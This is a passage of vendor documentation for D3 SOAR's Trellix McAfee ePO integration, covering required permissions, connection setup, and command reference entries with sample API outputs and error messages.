Skip to main content
Skip table of contents

Trellix McAfee ePO

Overview

McAfee ePolicy Orchestrator (McAfee ePO) centralizes and streamlines the management of endpoint, network, data security, and compliance solutions.

D3 SOAR is providing REST operations to function with Trellix McAfee ePO.

Trellix McAfee ePO is available for use in:

D3 SOAR

V12.7.83.0+

Category

Endpoint Security

Deployment Options

Option I, Option III

Connection

To connect to Trellix McAfee ePO from D3 SOAR, please follow this part to collect the required information below:

Parameter

Description

Example

Server URL

The URL of the Trellix McAfee ePO server.

https://1.1.1.1:8443

Username

The username for authentication.

admin

Password

The password for authentication.

D**ec**it**

Permission Requirements

Each endpoint in the Trellix McAfee ePO API requires a certain permission scope. The following are required scopes for the commands in this integration:

Command

Permission Set

Required Permissions

Add Tag

N/A

Administrator

Assign Policy To System

N/A

Administrator

Check Latest DAT

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

Check Repository Compliance

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

Determine Repository

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

Fetch Event

Queries and Reports

Queries and Reports: Use public groups; create and edit private queries/reports

Find Client Task

McAfee Agent

McAfee Agent (Tasks): View settings

Find Group

System Tree access

Select My Organization

Find Groups

System Tree access

Select My Organization

Find Package

Software

Master Repository: View packages

Find Policy

Data Loss Prevention

  • DLP Policies: User can view all DLP policies in policy catalog

  • Definitions (Permissions): Select full access for all permissions

  • Classification (Actions): Manage manual classifications, Registered documents and whitelisted text

  • Classifications (Permissions): Full permissions

  • DLP Policy Manager (Rule Sets Access Control): Full permissions

  • DLP Policy Manager (Rule Types): Data Protection, Device Control, Discovery

Find Repository

Software

  • Master Repository: View packages

  • Distributed Repositories: View repositories

(These permissions will only return limited information, only the Administrator access can return all repository)

Find System

Systems

System Tree: View "System Tree" tab

Find System By Tag Name

Queries and Reports

Queries and Reports: Use public groups

Find System In Group

Queries and Reports

Queries and Reports: Use public groups

System Tree access

Select My Organization

Find Systems By Group IDs

Queries and Reports

Queries and Reports: Use public groups

System Tree access

Select My Organization

Find Tag

Systems

Tag use: Apply, exclude, and clear tags

Get Device Info

Queries and Reports

Queries and Reports: Use public groups

System Tree access

Select My Organization

Get DLP Incident

Incident Management

  • Incident Access by Type: Data Protection, Device Control, Endpoint Discovery, Network Discovery

  • Incident Access by Reviewer (advanced): User can view all incidents, User can view incidents with external reviewer (Reported b MVISION Cloud)

  • Evidence File Access: User can view evidence files, User can view match string files

  • Incident Tasks: User can create a Mail Notification task, User can create a Purge notification task, User can create a Set Reviewer task

  • Incident Data Redaction: Supervisor permission

Queries and Reports

Queries and Reports: Use public groups; create and edit private queries/reports.

Get Task Info By Product Object

Endpoint Security Threat Prevention

Endpoint Security Threat Prevention (Tasks): View settings

Get Threat Events

Queries and Reports

Queries and Reports: Use public groups

Threat Event Log

Threat Event Log: View events

Get Version

N/A

Administrator

eList All Server Task

Server tasks

Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log

List Database

N/A

Administrator

List Data Type

Queries and Reports

Queries and Reports: Use public groups

List Permission Set

N/A

Administrator

List Query

Queries and Reports

Queries and Reports: Use public groups

List Repository

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

List Running Server Task

Server tasks

Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log

List Sub Task History

Server tasks

Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log

List Table

Queries and Reports

Queries and Reports: Use public groups; create and edit private queries/reports.

List Task History

Server tasks

Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log

List User

N/A

Administrator

Remove Tag

N/A

Administrator

Repo List

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

Retrieve Current DAT Version

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

Run Client Task

N/A

Administrator

Scan End Point By IP

Software

  • Master Repository: View packages

  • Distributed Repository: View repositories

Scan End Points By Group Name

System Tree access

Select My Organization

Scan End Points By Tag Name

N/A

Administrator

Search Threat Events

N/A

Administrator

Update Endpoints

N/A

Administrator

Update Repository

N/A

Administrator

Wake Up Agent

Systems

Actions: Wake up agents; view Agent Activity Log

Test Connection

N/A

No permissions needed

As Trellix McAfee ePO is using role-based access control (RBAC), the D3 connector will be generated based on a specific user account and the application. Therefore, the command permissions are inherited from the user account’s role. Users need to configure their user profile from the Trellix McAfee ePO console for each command in this integration.

Reader Note

  • The Administrator role is required to run certain commands. Refer to step 3d of the Creating a User section for more information.

  • The Find Repository command required the Administrator role to retrieve all results. The minimum permissions listed in the table above will only yield partial results.

Configuring Trellix McAfee ePO to Work with D3 SOAR

Creating a User

  1. Once logged into your Trellix McAfee ePO environment, navigate to User Management > Users.

  2. Click on New User.

  3. Configure the new user.

    1. Enter a user name. This will be the username used to establish and authenticate your connection in D3 SOAR.

    2. Determine whether to enable or disable the logon status for this account. If the account is for someone who is not yet part of the organization, disabling it might be preferable.

    3. Select ePO authentication. Enter a temporary password for the user account. The password must be changed upon initial login, which will also be used to establish and authenticate your connection in D3 SOAR.

    4. Decide whether to grant administrative privileges or select appropriate permission sets for the user.

  4. Click Save to complete the process.

Adding and Editing a Permission Set

  1. Once logged into your Trellix McAfee ePO environment, navigate to User Management > Permission Sets.

  2. Add or edit a permission set.

    • Add a permission set:

      1. Click New Permission Set.

      2. Enter a unique name for the new permission set.

      3. Assign specific users to this permission set by selecting their usernames.

      4. Click Save.

    • Edit a permission set:

      1. Select the desired permission set to modify.

      2. Locate the Name and users permission. Click Edit to add or remove permissions to the user. Click Save.

      3. Repeat the same steps to modify other permissions within the permission set.

Configuring D3 SOAR to Work with Trellix McAfee ePO

  1. Log in to D3 SOAR.

  2. Find the Trellix McAfee ePO integration.

    1. Navigate to Configuration on the top header menu.

    2. Click on the Integration icon on the left sidebar.

    3. Type Trellix McAfee ePO in the search box to find the integration, then click it to select it.

    4. Click + New Connection, on the right side of the Connections section. A new connection window will appear.

  3. Configure the following fields to create a connection to Trellix McAfee ePO.

    1. Connection Name: The desired name for the connection.

    2. Site: Specifies the site to use the integration connection. Use the drop-down menu to select the site. The Share to Internal Sites option enables all sites defined as internal sites to use the connection. Selecting a specific site will only enable that site to use the connection.

    3. Recipient site for events from connections Shared to Internal Sites: This field appears if you selected Share to Internal Sites for Site to let you select the internal site to deploy the integration connection.

    4. Agent Name (Optional): Specifies the proxy agent required to build the connection. Use the dropdown menu to select the proxy agent from a list of previously configured proxy agents.

    5. Description (Optional): Add your desired description for the connection.

    6. Tenant (Optional): When configuring the connection from a master tenant site, you have the option to choose the specific tenant sites you want to share the connection with. Once you enable this setting, you can filter and select the desired tenant sites from the dropdowns to share the connection.

    7. Configure User Permissions: Defines which users have access to the connection.

    8. Active: Check the tick box to ensure the connection is available for use.

    9. System: This section contains the parameters defined specifically for the integration. These parameters must be configured to create the integration connection.
      1. Input the Server URL of your Trellix McAfee ePO environment.
      2. input your Username.
      3. Input your Password.

    10. Enable Password Vault: An optional feature that allows users to take the stored credentials from their own password vault. Please refer to the password vault connection guide if needed.

  4. Test the connection.

    1. Click Test Connection to verify the account credentials and network connection. If the Test Connection Passed alert window appears, the test connection is successful. You will see Passed with a green checkmark appear beside the Test Connection button. If the test connection fails, please check your connection parameters and try again.

    2. Click OK to close the alert window.

    3. Click + Add to create and add the configured connection.

Commands

Trellix McAfee ePO includes the following executable commands for users to set up schedules or create playbook workflows. With the Test Command, you can execute these commands independently for playbook troubleshooting.

Integration API Note

For more information about the Trellix McAfee ePO API, please refer to the Trellix McAfee ePO API reference.

Reader Note

Certain permissions are required for each command. Please refer to the Permission Requirements and Configuring Trellix McAfee ePO to Work with D3 SOAR for details.

Note for Time-related parameters

The input format of time-related parameters may vary based on your account settings. As a result, the sample data provided in our commands is different from what you see. To set your preferred time format, follow these steps:

  1. Navigate to Configuration > Application Settings. Select Date/Time Format.

  2. Choose your desired date and time format.

After that, you will be able to view your preferred time format when configuring the DateTime input parameters for commands.

Add Tag

Adds a tag to an endpoint in McAfee ePO.

Input

Input Parameter

Required/Optional

Description

Example

Endpoint

Required

The endpoint to add a tag.

dc_auto_mtrg

Tag Name

Required

The name of the tag to add to the specified endpoint.

YABINGUO

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "Status": "Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully."
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "Status": "Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully."
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"{\\\"Status\\\":\\\"Tag SERVER has been applied to 0 endpoint(s) successfully.\\\"}\\r\\n\"",
    "Status": "\"Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully.\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

Status

Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully.

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Add Tag failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 400.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Error 0 :\r\n\r\n.

Error Sample Data

Add Tag failed.

Status Code: 400.

Message: Error 0 :\r\n\r\n.

Assign Policy To System

Assigns a policy to specified endpoints.

Input

Input Parameter

Required/Optional

Description

Example

Endpoints

Required

The list of endpoints to assign a policy.

d*****-dc

Product ID

Required

The product ID to assign to the specified endpoints.

1

Type ID

Required

The type ID to assign to the specified endpoints.

69

Object ID

Required

The object ID to assign to the specified endpoints.

1

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "results": [
        {
            "name": "d*****-dc",
            "id": "*****",
            "message": "Assign policy succeeded",
            "status": 0
        }
    ]
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "results": [
        {
            "name": "d*****-dc",
            "id": "*****",
            "message": "Assign policy succeeded",
            "status": 0
        }
    ]
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"{\\r\\n    \\\"results\\\": [\\r\\n        {\\r\\n            \\\"name\\\": \\\"*****-dc\\\",\\r\\n            \\\"id\\\": \\\"*****\\\",\\r\\n            \\\"message\\\": \\\"Assign policy succeeded\\\",\\r\\n            \\\"status\\\": 0\\r\\n        }\\r\\n    ]\\r\\n}\"",
    "results": "\"[\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"*****-dc\\\",\\r\\n \\r\\n  \\\"id\\\": \\\"*****\\\",\\r\\n \\r\\n  \\\"message\\\": \\\"Assign policy succeeded\\\",\\r\\n \\r\\n  \\\"status\\\": 0\\r\\n \\r\\n  }\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

results

{

";name";: ";*****-dc";,

";id";: ";*****";,

";message";: ";Assign policy succeeded";,

";status";: 0

}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Assign Policy To System failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 404.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unable to take action on the computer because it may not exist.

Error Sample Data

Assign Policy To System failed.

Status Code: 404.

Message: Unable to take action on the computer because it may not exist.

Check Latest DAT

Returns the latest DAT version.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "LatestDATVersion": "9524"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "LatestDATVersion": "9524"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "LatestDATVersion": "\"9524\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

LatestDATVersion

9524

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Check Latest DAT failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Check Latest DAT failed.

Status Code: 401.

Message: Unauthorized.

Check Repository Compliance

Checks repository compliance based on the specified DAT version.

Reader Note

Required DAT Version is a required parameter to run this command.

  • The latest Required DAT Version can be found from the Check Latest DAT command in the returned raw data at the path $.LatestDATVersion.

Input

Input Parameter

Required/Optional

Description

Example

Required DAT Version

Required

The DAT version number to check repository compliance.

9472

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "CurrentDATVersion": "9534.0000",
    "RequiredDATVersion": "9472",
    "Status": "OK"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "CurrentDATVersion": "9534.0000",
    "RequiredDATVersion": "9472",
    "Status": "OK"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "CurrentDATVersion": "\"9534.0000\"",
    "RequiredDATVersion": "\"9472\"",
    "Status": "\"OK\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

CurrentDATVersion

9534.0000

RequiredDATVersion

9472

Status

OK

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Check Repository Compliance failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 400.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: could not convert string to float.

Error Sample Data

Check Repository Compliance failed.

Status Code: 400.

Message: could not convert string to float.

Determine Repository

Returns details of the specified repository.

Input

Input Parameter

Required/Optional

Description

Example

Repository Name

Required

The name of the repository to retrieve details.

ePO_***-AD

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "ePO_***-AD",
        "spipeServerName": "***-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "ePO_***-AD",
        "repositoryType": 2,
        "location": "***-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "ePO_***-AD",
        "spipeServerName": "***-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "ePO_***-AD",
        "repositoryType": 2,
        "location": "***-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"SAServerDNS\\\": \\\"\\\",\\r\\n        \\\"disableV1DATReplication\\\": false,\\r\\n        \\\"spipeServerDNS\\\": null,\\r\\n        \\\"repositoryTypeString\\\": \\\"master\\\",\\r\\n        \\\"useAnonCreds\\\": false,\\r\\n        \\\"downloadCredPassword\\\": \\\"\\\",\\r\\n        \\\"downloadCredDomain\\\": \\\"\\\",\\r\\n        \\\"lockType\\\": 0,\\r\\n        \\\"enabled\\\": true,\\r\\n        \\\"uncUseLoggedOnUser\\\": false,\\r\\n        \\\"uncOrder\\\": \\\"1\\\",\\r\\n        \\\"protocol\\\": 1,\\r\\n        \\\"lockedBy\\\": \\\"\\\",\\r\\n        \\\"softwareInclusionList\\\": [],\\r\\n        \\\"uploadCredUsername\\\": \\\"\\\",\\r\\n        \\\"spipeVersion\\\": \\\"4.5.0\\\",\\r\\n        \\\"SAServerNetbios\\\": \\\"\\\",\\r\\n        \\\"protocolString\\\": \\\"SpipeSite\\\",\\r\\n        \\\"disableFullDATReplication\\\": false,\\r\\n        \\\"replicationUNC\\\": \\\"\\\",\\r\\n        \\\"SAServerIP\\\": \\\"\\\",\\r\\n        \\\"addressType\\\": null,\\r\\n        \\\"autoID\\\": 3,\\r\\n        \\\"softwareExclusionList\\\": null,\\r\\n        \\\"repositoryTypeAsString\\\": null,\\r\\n        \\\"repositoryName\\\": \\\"ePO_***-AD\\\",\\r\\n        \\\"spipeServerName\\\": \\\"D3Lab-AD\\\",\\r\\n        \\\"uploadCredDomain\\\": \\\"\\\",\\r\\n        \\\"repositoryPort\\\": 80,\\r\\n        \\\"downloadPasswordEncrypted\\\": true,\\r\\n        \\\"httpUseAuth\\\": false,\\r\\n        \\\"downloadCredUsername\\\": \\\"\\\",\\r\\n        \\\"includeAllSoftware\\\": true,\\r\\n        \\\"repositoryId\\\": \\\"ePO_***-AD\\\",\\r\\n        \\\"repositoryType\\\": 2,\\r\\n        \\\"location\\\": \\\"D3Lab-AD/Software\\\",\\r\\n        \\\"updateExclusionList\\\": true,\\r\\n        \\\"spipeServerIP\\\": \\\"192.168.82.10\\\",\\r\\n        \\\"uploadCredPassword\\\": \\\"\\\",\\r\\n        \\\"fallback\\\": false,\\r\\n        \\\"repliPasswordEncrypted\\\": true\\r\\n    }\\r\\n]\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"ePO_***-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"ePO_***-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"***-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"[\\r\\n \\r\\n  \\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

SAServerDNS

disableV1DATReplication

spipeServerDNS

repositoryTypeString

useAnonCreds

downloadCredPassword

downloadCredDomain

lockType

enabled

uncUseLoggedOnUser

uncOrder

protocol

lockedBy

softwareInclusionList

uploadCredUsername

spipeVersion

SAServerNetbios

protocolString

disableFullDATReplication

replicationUNC

SAServerIP

addressType

autoID

softwareExclusionList

repositoryTypeAsString

repositoryName

spipeServerName

uploadCredDomain

repositoryPort

downloadPasswordEncrypted

httpUseAuth

downloadCredUsername

includeAllSoftware

repositoryId

repositoryType

location

updateExclusionList

spipeServerIP

uploadCredPassword

fallback

repliPasswordEncrypted

False

master

False

0

True

False

1

1

[]

4.5.0

SpipeSite

False

3

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Determine Repository failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Determine Repository failed.

Status Code: 401.

Message: Unauthorized.

Fetch Event

Retrieves events from Trellix McAfee ePO based on the specified criteria.

Input

Input Parameter

Required/Optional

Description

Example

Start Time

Optional

The start time of the time range to fetch events after the specified time stamp, in UTC time.

2020-01-01 00:00

End Time

Optional

The end time of the time range to fetch events before the specified time stamp, in UTC time.

2020-10-01 00:00

Number of Event(s) Fetched

Optional

The maximum number of the most recent events to return.

100

Search Condition

Optional

The query string defining the search condition for fetching events. For more information about the query syntax, refer to the Trellix McAfee ePO API documentation.

Note: The input severity value must be an integer. The severity values are defined as follows: 0-Info, 1-Warning, 2-Minor, 3-Major, 4-Critical.

Condition for search Events:

(where (eq EPOEvents.ThreatType "trojan" ))

Condition for search DLP Incidents

( where

(and (eq UDLP_Incidents.Severity "3")

(eq UDLP_IncidentStatuses.StatusKey "NEW")

)

)

Is DLP Incident

Optional

The option to fetch DLP incidents as events. The default value is No.

Yes

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "AutoGUID": "***-***-***-***-***",
        "TargetFileName": "C:\\Users\\Administrator\\Desktop\\atomic-red-team-master\\atomic-red-team-master\\atomics\\T1055\\bin\\T1055.exe",
        "SourceIPV4": "1.1.1.1",
        "SourceProcessName": "C:\\Windows\\explorer.exe",
        "ReceivedUTC": "2020-08-19T10:02:45-07:00",
        "DetectedUTC": "2020-08-19T09:56:35-07:00",
        "AnalyzerName": "McAfee Endpoint Security",
        "AnalyzerVersion": "10.7.0",
        "AnalyzerHostName": "D3cyber-PC5",
        "AnalyzerIPV4": "192.168.85.11",
        "AnalyzerIPV6": "0:0:0:0:0:FFFF:C0A8:550B",
        "AnalyzerMAC": "000c29cb025a",
        "AnalyzerDATVersion": "4169.0",
        "AnalyzerEngineVersion": "6100.8979",
        "AnalyzerDetectionMethod": "On-Access Scan",
        "SourceHostName": "D3cyber-PC5",
        "SourceIPV6": "0:0:0:0:0:FFFF:C0A8:550B",
        "TargetHostName": "D3cyber-PC5",
        "TargetIPV4": "192.168.85.11",
        "TargetIPV6": "0:0:0:0:0:FFFF:C0A8:550B",
        "TargetUserName": "D3CYBER-PC5\\Administrator",
        "ThreatEventID": 1027,
        "ThreatSeverity": 2,
        "ThreatName": "RDN/Generic Dropper",
        "ThreatType": "trojan",
        "ThreatActionTaken": "IDS_ALERT_ACT_TAK_DEL",
        "ThreatHandled": true,
        "IsDLPIncidents": false
    },
    {
        "IncidentId": 2,
        "ComputerID": 10003,
        "IncidentType": 10000,
        "ViolationLocalTime": "2021-04-08T11:40:08-07:00",
        "ViolationTimezone": "Pacific Daylight Time",
        "TotalMatchCount": 0,
        "TotalContentSize": 0,
        "PolicyInfoId": 2,
        "RulesToDisplay": "Plug and Play Device Rule",
        "SourceApplicationId": null,
        "Severity": 3,
        "StatusId": "2",
        "ResolutionId": "2",
        "ActualAction": 0,
        "ExpectedAction": 0,
        "FailureReason": 0,
        "JustificationText": "",
        "McAfeeAgentGuid": "6FB58B73-B510-4B5E-998A-331317FD5709",
        "EvidenceCount": 0,
        "ReportingProduct": 1,
        "destination": "portable devices",
        "ShortMatchString": "",
        "DestinationUserID": null,
        "ExternalId": null,
        "ActivityEnum": null,
        "Name": "LAPTOP-IE3MEDPQ",
        "IP": "192.168.1.215",
        "PrimaryUserAccountID": "LAPTOP-IE3MEDPQ\\admin@",
        "Username_NTLM": "LAPTOP-IE3MEDPQ\\admin",
        "FQDN": null,
        "UserName": "admin",
        "SID": null,
        "UID": null,
        "UserOU": "",
        "FirstName": null,
        "LastName": null,
        "PrimaryEmailAddress": "",
        "UserTitle": "",
        "UserBusinessUnit": null,
        "UserDepartment": "",
        "UserCity": null,
        "UserCountry": null,
        "UserCompany": null,
        "UserManagerAccountID": "",
        "DLPReviewerUserAccount": null,
        "Custom1": null,
        "Custom2": null,
        "Custom3": null,
        "UserStatus": null,
        "LastDayInOffice": null,
        "LastDayInOfficeYYYYMM": null,
        "LastUpdated": null,
        "LastUpdatedBy": null,
